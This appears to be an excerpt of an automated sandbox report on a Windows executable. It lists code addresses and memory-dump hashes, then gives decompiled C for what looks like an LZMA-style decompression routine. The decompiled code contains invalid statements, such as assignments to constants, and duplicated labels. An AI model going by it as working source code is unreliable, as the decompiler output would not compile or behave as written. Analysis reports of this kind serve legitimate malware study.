                              0x00406ec1
                              0x00406ec4
                              0x00406ec6
                              0x00406ec8
                              0x00406ecb
                              0x00406ecd
                              0x00406ed0
                              0x00406ed4
                              0x00406ed6
                              0x00406ed6
                              0x00406ed7
                              0x00406eda
                              0x00406edd
                              0x00406e9f
                              0x00406e9f
                              0x00406ea7
                              0x00406eac
                              0x00406eae
                              0x00406eb1
                              0x00406eb1
                              0x00406ee0
                              0x00406ee7
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00406e71
                              0x00000000
                              0x00406ee9
                              0x00000000
                              0x00406ee9
                              0x00406ee7
                              0x00406dfa
                              0x00406dfd
                              0x00406dff
                              0x00406e02
                              0x00406e05
                              0x00406e08
                              0x00406e0a
                              0x00406e0d
                              0x00406e10
                              0x00406e10
                              0x00406e13
                              0x00406e13
                              0x00406e16
                              0x00406e1d
                              0x00406df1
                              0x00406df1
                              0x00406df1
                              0x00406df1
                              0x00000000
                              0x00406e1f
                              0x00000000
                              0x00406e1f
                              0x00406e1d
                              0x00406da3
                              0x00406da6
                              0x00406da8
                              0x00406dab
                              0x00000000
                              0x00000000
                              0x00406b0a
                              0x00406b0a
                              0x00406b0e
                              0x00407153
                              0x00000000
                              0x00407153
                              0x00406b14
                              0x00406b17
                              0x00406b1a
                              0x00406b1d
                              0x00406b20
                              0x00406b23
                              0x00406b26
                              0x00406b28
                              0x00406b2b
                              0x00406b2e
                              0x00406b31
                              0x00406b33
                              0x00406b33
                              0x00406b33
                              0x00000000
                              0x00000000
                              0x00406c95
                              0x00406c95
                              0x00406c99
                              0x0040715f
                              0x00000000
                              0x0040715f
                              0x00406c9f
                              0x00406ca2
                              0x00406ca5
                              0x00406ca8
                              0x00406caa
                              0x00406caa
                              0x00406caa
                              0x00406cad
                              0x00406cb0
                              0x00406cb3
                              0x00406cb6
                              0x00406cb9
                              0x00406cbc
                              0x00406cbd
                              0x00406cbf
                              0x00406cbf
                              0x00406cbf
                              0x00406cc2
                              0x00406cc5
                              0x00406cc8
                              0x00406ccb
                              0x00406ccb
                              0x00406ccb
                              0x00406cce
                              0x00406cd0
                              0x00406cd0
                              0x00000000
                              0x00000000
                              0x00406f12
                              0x00406f12
                              0x00406f12
                              0x00406f16
                              0x00000000
                              0x00000000
                              0x00406f1c
                              0x00406f1f
                              0x00406f22
                              0x00406f25
                              0x00406f27
                              0x00406f27
                              0x00406f27
                              0x00406f2a
                              0x00406f2d
                              0x00406f30
                              0x00406f33
                              0x00406f36
                              0x00406f39
                              0x00406f3a
                              0x00406f3c
                              0x00406f3c
                              0x00406f3c
                              0x00406f3f
                              0x00406f42
                              0x00406f45
                              0x00406f48
                              0x00406f4b
                              0x00406f4f
                              0x00406f51
                              0x00406f54
                              0x00000000
                              0x00406f56
                              0x00406cd3
                              0x00406cd3
                              0x00000000
                              0x00406cd3
                              0x00406f54
                              0x00407189
                              0x004071ab
                              0x004071b1
                              0x004071b3
                              0x004071ba
                              0x00000000
                              0x00000000
                              0x004067b8
                              0x004071c0
                              0x004071c0
                              0x00000000

                              Memory Dump Source
                              • Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp
                              • Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp
                              • Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                              • Instruction ID: 8282c7973928a3a8991f4aebeb421c6794774a39cdfa424cdd26f1de73b17733
                              • Opcode Fuzzy Hash: 4d3c90e2c2c281b0151b8bc02d48c609eaff53916cbf358625803cc36882de51
                              • Instruction Fuzzy Hash: 74816571D14228DBDF28CFA8C844BADBBB1FB44305F14816AD856BB2C1C7786A86DF45
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 98%
                              			E00406BC4() {
                              				signed int _t539;
                              				unsigned short _t540;
                              				signed int _t541;
                              				void _t542;
                              				signed int _t543;
                              				signed int _t544;
                              				signed int _t573;
                              				signed int _t576;
                              				signed int _t597;
                              				signed int* _t614;
                              				void* _t621;
                              
                              				L0:
                              				while(1) {
                              					L0:
                              					if( *(_t621 - 0x40) != 1) {
                              						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                              						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                              						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                              						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                              						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                              						_t539 =  *(_t621 - 4) + 0x664;
                              						 *(_t621 - 0x58) = _t539;
                              						goto L68;
                              					} else {
                              						 *(__ebp - 0x84) = 8;
                              						while(1) {
                              							L132:
                              							 *(_t621 - 0x54) = _t614;
                              							while(1) {
                              								L133:
                              								_t540 =  *_t614;
                              								_t597 = _t540 & 0x0000ffff;
                              								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                              								if( *(_t621 - 0xc) >= _t573) {
                              									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                              									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                              									 *(_t621 - 0x40) = 1;
                              									_t541 = _t540 - (_t540 >> 5);
                              									 *_t614 = _t541;
                              								} else {
                              									 *(_t621 - 0x10) = _t573;
                              									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                              									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                              								}
                              								if( *(_t621 - 0x10) >= 0x1000000) {
                              									goto L139;
                              								}
                              								L137:
                              								if( *(_t621 - 0x6c) == 0) {
                              									 *(_t621 - 0x88) = 5;
                              									L170:
                              									_t576 = 0x22;
                              									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                              									_t544 = 0;
                              									L172:
                              									return _t544;
                              								}
                              								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                              								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                              								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                              								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                              								L139:
                              								_t542 =  *(_t621 - 0x84);
                              								while(1) {
                              									 *(_t621 - 0x88) = _t542;
                              									while(1) {
                              										L1:
                              										_t543 =  *(_t621 - 0x88);
                              										if(_t543 > 0x1c) {
                              											break;
                              										}
                              										switch( *((intOrPtr*)(_t543 * 4 +  &M004071C8))) {
                              											case 0:
                              												if( *(_t621 - 0x6c) == 0) {
                              													goto L170;
                              												}
                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                              												_t543 =  *( *(_t621 - 0x70));
                              												if(_t543 > 0xe1) {
                              													goto L171;
                              												}
                              												_t547 = _t543 & 0x000000ff;
                              												_push(0x2d);
                              												asm("cdq");
                              												_pop(_t578);
                              												_push(9);
                              												_pop(_t579);
                              												_t617 = _t547 / _t578;
                              												_t549 = _t547 % _t578 & 0x000000ff;
                              												asm("cdq");
                              												_t612 = _t549 % _t579 & 0x000000ff;
                              												 *(_t621 - 0x3c) = _t612;
                              												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                              												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                              												_t620 = (0x300 << _t612 + _t617) + 0x736;
                              												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                              													L10:
                              													if(_t620 == 0) {
                              														L12:
                              														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                              														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                              														goto L15;
                              													} else {
                              														goto L11;
                              													}
                              													do {
                              														L11:
                              														_t620 = _t620 - 1;
                              														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                              													} while (_t620 != 0);
                              													goto L12;
                              												}
                              												if( *(_t621 - 4) != 0) {
                              													GlobalFree( *(_t621 - 4));
                              												}
                              												_t543 = GlobalAlloc(0x40, 0x600); // executed
                              												 *(_t621 - 4) = _t543;
                              												if(_t543 == 0) {
                              													goto L171;
                              												} else {
                              													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                              													goto L10;
                              												}
                              											case 1:
                              												L13:
                              												__eflags =  *(_t621 - 0x6c);
                              												if( *(_t621 - 0x6c) == 0) {
                              													 *(_t621 - 0x88) = 1;
                              													goto L170;
                              												}
                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                              												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                              												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                              												_t45 = _t621 - 0x48;
                              												 *_t45 =  *(_t621 - 0x48) + 1;
                              												__eflags =  *_t45;
                              												L15:
                              												if( *(_t621 - 0x48) < 4) {
                              													goto L13;
                              												}
                              												_t555 =  *(_t621 - 0x40);
                              												if(_t555 ==  *(_t621 - 0x74)) {
                              													L20:
                              													 *(_t621 - 0x48) = 5;
                              													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                              													goto L23;
                              												}
                              												 *(_t621 - 0x74) = _t555;
                              												if( *(_t621 - 8) != 0) {
                              													GlobalFree( *(_t621 - 8));
                              												}
                              												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                              												 *(_t621 - 8) = _t543;
                              												if(_t543 == 0) {
                              													goto L171;
                              												} else {
                              													goto L20;
                              												}
                              											case 2:
                              												L24:
                              												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                              												 *(_t621 - 0x84) = 6;
                              												 *(_t621 - 0x4c) = _t562;
                              												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                              												goto L132;
                              											case 3:
                              												L21:
                              												__eflags =  *(_t621 - 0x6c);
                              												if( *(_t621 - 0x6c) == 0) {
                              													 *(_t621 - 0x88) = 3;
                              													goto L170;
                              												}
                              												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                              												_t67 = _t621 - 0x70;
                              												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                              												__eflags =  *_t67;
                              												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                              												L23:
                              												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                              												if( *(_t621 - 0x48) != 0) {
                              													goto L21;
                              												}
                              												goto L24;
                              											case 4:
                              												L133:
                              												_t540 =  *_t614;
                              												_t597 = _t540 & 0x0000ffff;
                              												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                              												if( *(_t621 - 0xc) >= _t573) {
                              													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                              													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                              													 *(_t621 - 0x40) = 1;
                              													_t541 = _t540 - (_t540 >> 5);
                              													 *_t614 = _t541;
                              												} else {
                              													 *(_t621 - 0x10) = _t573;
                              													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                              													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                              												}
                              												if( *(_t621 - 0x10) >= 0x1000000) {
                              													goto L139;
                              												}
                              											case 5:
                              												goto L137;
                              											case 6:
                              												__edx = 0;
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													__eax =  *(__ebp - 4);
                              													__ecx =  *(__ebp - 0x38);
                              													 *(__ebp - 0x34) = 1;
                              													 *(__ebp - 0x84) = 7;
                              													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                              													L132:
                              													 *(_t621 - 0x54) = _t614;
                              													goto L133;
                              												}
                              												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                              												__esi =  *(__ebp - 0x60);
                              												__cl = 8;
                              												__cl = 8 -  *(__ebp - 0x3c);
                              												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                              												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                              												__ecx =  *(__ebp - 0x3c);
                              												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                              												__ecx =  *(__ebp - 4);
                              												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                              												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                              												__eflags =  *(__ebp - 0x38) - 4;
                              												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                              												if( *(__ebp - 0x38) >= 4) {
                              													__eflags =  *(__ebp - 0x38) - 0xa;
                              													if( *(__ebp - 0x38) >= 0xa) {
                              														_t98 = __ebp - 0x38;
                              														 *_t98 =  *(__ebp - 0x38) - 6;
                              														__eflags =  *_t98;
                              													} else {
                              														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                              													}
                              												} else {
                              													 *(__ebp - 0x38) = 0;
                              												}
                              												__eflags =  *(__ebp - 0x34) - __edx;
                              												if( *(__ebp - 0x34) == __edx) {
                              													__ebx = 0;
                              													__ebx = 1;
                              													goto L61;
                              												} else {
                              													__eax =  *(__ebp - 0x14);
                              													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                              													__eflags = __eax -  *(__ebp - 0x74);
                              													if(__eax >=  *(__ebp - 0x74)) {
                              														__eax = __eax +  *(__ebp - 0x74);
                              														__eflags = __eax;
                              													}
                              													__ecx =  *(__ebp - 8);
                              													__ebx = 0;
                              													__ebx = 1;
                              													__al =  *((intOrPtr*)(__eax + __ecx));
                              													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                              													goto L41;
                              												}
                              											case 7:
                              												goto L0;
                              											case 8:
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													__eax =  *(__ebp - 4);
                              													__ecx =  *(__ebp - 0x38);
                              													 *(__ebp - 0x84) = 0xa;
                              													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                              												} else {
                              													__eax =  *(__ebp - 0x38);
                              													__ecx =  *(__ebp - 4);
                              													__eax =  *(__ebp - 0x38) + 0xf;
                              													 *(__ebp - 0x84) = 9;
                              													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                              													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                              												}
                              												while(1) {
                              													L132:
                              													 *(_t621 - 0x54) = _t614;
                              													goto L133;
                              												}
                              											case 9:
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													goto L89;
                              												}
                              												__eflags =  *(__ebp - 0x60);
                              												if( *(__ebp - 0x60) == 0) {
                              													goto L171;
                              												}
                              												__eax = 0;
                              												__eflags =  *(__ebp - 0x38) - 7;
                              												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                              												__eflags = _t258;
                              												0 | _t258 = _t258 + _t258 + 9;
                              												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                              												goto L75;
                              											case 0xa:
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													__eax =  *(__ebp - 4);
                              													__ecx =  *(__ebp - 0x38);
                              													 *(__ebp - 0x84) = 0xb;
                              													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                              													while(1) {
                              														L132:
                              														 *(_t621 - 0x54) = _t614;
                              														goto L133;
                              													}
                              												}
                              												__eax =  *(__ebp - 0x28);
                              												goto L88;
                              											case 0xb:
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													__ecx =  *(__ebp - 0x24);
                              													__eax =  *(__ebp - 0x20);
                              													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                              												} else {
                              													__eax =  *(__ebp - 0x24);
                              												}
                              												__ecx =  *(__ebp - 0x28);
                              												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                              												L88:
                              												__ecx =  *(__ebp - 0x2c);
                              												 *(__ebp - 0x2c) = __eax;
                              												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                              												L89:
                              												__eax =  *(__ebp - 4);
                              												 *(__ebp - 0x80) = 0x15;
                              												__eax =  *(__ebp - 4) + 0xa68;
                              												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                              												goto L68;
                              											case 0xc:
                              												L99:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0xc;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t334 = __ebp - 0x70;
                              												 *_t334 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t334;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												__eax =  *(__ebp - 0x2c);
                              												goto L101;
                              											case 0xd:
                              												L37:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0xd;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t122 = __ebp - 0x70;
                              												 *_t122 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t122;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												L39:
                              												__eax =  *(__ebp - 0x40);
                              												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                              												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                              													goto L48;
                              												}
                              												__eflags = __ebx - 0x100;
                              												if(__ebx >= 0x100) {
                              													goto L54;
                              												}
                              												L41:
                              												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                              												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                              												__ecx =  *(__ebp - 0x58);
                              												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                              												 *(__ebp - 0x48) = __eax;
                              												__eax = __eax + 1;
                              												__eax = __eax << 8;
                              												__eax = __eax + __ebx;
                              												__esi =  *(__ebp - 0x58) + __eax * 2;
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                              												__ax =  *__esi;
                              												 *(__ebp - 0x54) = __esi;
                              												__edx = __ax & 0x0000ffff;
                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                              												__eflags =  *(__ebp - 0xc) - __ecx;
                              												if( *(__ebp - 0xc) >= __ecx) {
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              													__cx = __ax;
                              													 *(__ebp - 0x40) = 1;
                              													__cx = __ax >> 5;
                              													__eflags = __eax;
                              													__ebx = __ebx + __ebx + 1;
                              													 *__esi = __ax;
                              												} else {
                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                              													 *(__ebp - 0x10) = __ecx;
                              													0x800 = 0x800 - __edx;
                              													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                              													__ebx = __ebx + __ebx;
                              													 *__esi = __cx;
                              												}
                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                              												 *(__ebp - 0x44) = __ebx;
                              												if( *(__ebp - 0x10) >= 0x1000000) {
                              													goto L39;
                              												} else {
                              													goto L37;
                              												}
                              											case 0xe:
                              												L46:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0xe;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t156 = __ebp - 0x70;
                              												 *_t156 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t156;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												while(1) {
                              													L48:
                              													__eflags = __ebx - 0x100;
                              													if(__ebx >= 0x100) {
                              														break;
                              													}
                              													__eax =  *(__ebp - 0x58);
                              													__edx = __ebx + __ebx;
                              													__ecx =  *(__ebp - 0x10);
                              													__esi = __edx + __eax;
                              													__ecx =  *(__ebp - 0x10) >> 0xb;
                              													__ax =  *__esi;
                              													 *(__ebp - 0x54) = __esi;
                              													__edi = __ax & 0x0000ffff;
                              													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              													__eflags =  *(__ebp - 0xc) - __ecx;
                              													if( *(__ebp - 0xc) >= __ecx) {
                              														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              														__cx = __ax;
                              														_t170 = __edx + 1; // 0x1
                              														__ebx = _t170;
                              														__cx = __ax >> 5;
                              														__eflags = __eax;
                              														 *__esi = __ax;
                              													} else {
                              														 *(__ebp - 0x10) = __ecx;
                              														0x800 = 0x800 - __edi;
                              														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              														__ebx = __ebx + __ebx;
                              														 *__esi = __cx;
                              													}
                              													__eflags =  *(__ebp - 0x10) - 0x1000000;
                              													 *(__ebp - 0x44) = __ebx;
                              													if( *(__ebp - 0x10) >= 0x1000000) {
                              														continue;
                              													} else {
                              														goto L46;
                              													}
                              												}
                              												L54:
                              												_t173 = __ebp - 0x34;
                              												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                              												__eflags =  *_t173;
                              												goto L55;
                              											case 0xf:
                              												L58:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0xf;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t203 = __ebp - 0x70;
                              												 *_t203 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t203;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												L60:
                              												__eflags = __ebx - 0x100;
                              												if(__ebx >= 0x100) {
                              													L55:
                              													__al =  *(__ebp - 0x44);
                              													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                              													goto L56;
                              												}
                              												L61:
                              												__eax =  *(__ebp - 0x58);
                              												__edx = __ebx + __ebx;
                              												__ecx =  *(__ebp - 0x10);
                              												__esi = __edx + __eax;
                              												__ecx =  *(__ebp - 0x10) >> 0xb;
                              												__ax =  *__esi;
                              												 *(__ebp - 0x54) = __esi;
                              												__edi = __ax & 0x0000ffff;
                              												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                              												__eflags =  *(__ebp - 0xc) - __ecx;
                              												if( *(__ebp - 0xc) >= __ecx) {
                              													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                              													__cx = __ax;
                              													_t217 = __edx + 1; // 0x1
                              													__ebx = _t217;
                              													__cx = __ax >> 5;
                              													__eflags = __eax;
                              													 *__esi = __ax;
                              												} else {
                              													 *(__ebp - 0x10) = __ecx;
                              													0x800 = 0x800 - __edi;
                              													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                              													__ebx = __ebx + __ebx;
                              													 *__esi = __cx;
                              												}
                              												__eflags =  *(__ebp - 0x10) - 0x1000000;
                              												 *(__ebp - 0x44) = __ebx;
                              												if( *(__ebp - 0x10) >= 0x1000000) {
                              													goto L60;
                              												} else {
                              													goto L58;
                              												}
                              											case 0x10:
                              												L109:
                              												__eflags =  *(__ebp - 0x6c);
                              												if( *(__ebp - 0x6c) == 0) {
                              													 *(__ebp - 0x88) = 0x10;
                              													goto L170;
                              												}
                              												__ecx =  *(__ebp - 0x70);
                              												__eax =  *(__ebp - 0xc);
                              												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                              												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                              												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                              												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												_t365 = __ebp - 0x70;
                              												 *_t365 =  *(__ebp - 0x70) + 1;
                              												__eflags =  *_t365;
                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                              												goto L111;
                              											case 0x11:
                              												L68:
                              												_t614 =  *(_t621 - 0x58);
                              												 *(_t621 - 0x84) = 0x12;
                              												while(1) {
                              													L132:
                              													 *(_t621 - 0x54) = _t614;
                              													goto L133;
                              												}
                              											case 0x12:
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													__eax =  *(__ebp - 0x58);
                              													 *(__ebp - 0x84) = 0x13;
                              													__esi =  *(__ebp - 0x58) + 2;
                              													while(1) {
                              														L132:
                              														 *(_t621 - 0x54) = _t614;
                              														goto L133;
                              													}
                              												}
                              												__eax =  *(__ebp - 0x4c);
                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                              												__ecx =  *(__ebp - 0x58);
                              												__eax =  *(__ebp - 0x4c) << 4;
                              												__eflags = __eax;
                              												__eax =  *(__ebp - 0x58) + __eax + 4;
                              												goto L130;
                              											case 0x13:
                              												__eflags =  *(__ebp - 0x40);
                              												if( *(__ebp - 0x40) != 0) {
                              													_t469 = __ebp - 0x58;
                              													 *_t469 =  *(__ebp - 0x58) + 0x204;
                              													__eflags =  *_t469;
                              													 *(__ebp - 0x30) = 0x10;
                              													 *(__ebp - 0x40) = 8;
                              													L144:
                              													 *(__ebp - 0x7c) = 0x14;
                              													goto L145;
                              												}
                              												__eax =  *(__ebp - 0x4c);
                              												__ecx =  *(__ebp - 0x58);
                              												__eax =  *(__ebp - 0x4c) << 4;
                              												 *(__ebp - 0x30) = 8;
